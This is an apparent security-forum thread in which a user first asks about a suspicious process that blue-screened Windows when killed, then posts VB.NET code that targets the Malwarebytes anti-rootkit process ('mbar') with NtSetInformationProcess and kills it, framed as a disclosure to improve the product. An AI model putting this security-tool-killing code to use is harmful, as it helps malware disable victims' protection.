
Hooligan3


  1. Hi all, recently I ran a scan of the MBR as I'm paranoid like that. The scan came back as "Unknown MBR". This made me curious, so I downloaded GMER and got to work trying to resolve this issue and get to the bottom of it. Here's when my worries began: I headed over to the process tab and found a process with a strange Chinese-like name. I clicked on it and clicked "Kill process", and my Windows blue-screened with the error "Driver not less or equal too". I come from the malware background and know it is possible to create a BSOD-protected process, and maybe the symbol stops the process appearing in TaskMGR. Unicode or some exploit like that. I've run the basic Farbar and MBAM Anti-rootkit etc. and all came back clean. Any other suggestions or advice on what this process could be? I've attached an image of the process in GMER below. The process I'm talking about is PID 104, if you can't see it already.
  2. MBAM anti-rootkit has been targeted by malware coded in VB.NET. Here's how malware can successfully disable MBAM anti-rootkit with around 10 lines of VB.NET. This is simple stuff, Malwarebytes! I'm disappointed! Here's the code:

         Try
             Dim s As Integer = 0
             Dim ProcessPriorityClass As Integer = 29
             Dim lpProcessName As String = "mbar" '<--- mbar is the Malwarebytes anti-rootkit
             For Each x As Process In Process.GetProcessesByName(lpProcessName)
                 If NtSetInformationProcess(x.Handle, ProcessPriorityClass, s, Marshal.SizeOf(s)) = 0 Then
                     x.Kill() 'Done.
                     x.Refresh()
                 Else
                     x.Kill()
                     x.Refresh()
                 End If
             Next
         Catch
             For Each ax As Process In Process.GetProcessesByName("mbar")
                 Try
                     ax.Refresh()
                     ax.Kill()
                     ax.CloseMainWindow()
                 Catch : End Try 'Most likely the ax.Refresh killed off mbar so ax.Kill failed with access denied!
             Next
         End Try

     This makes an error of unauthorised access on the mbar.exe (I'm on the admin account). PS: I'm not wanting any reply, just want to make MBAM better! I'm not arrogant, I promise!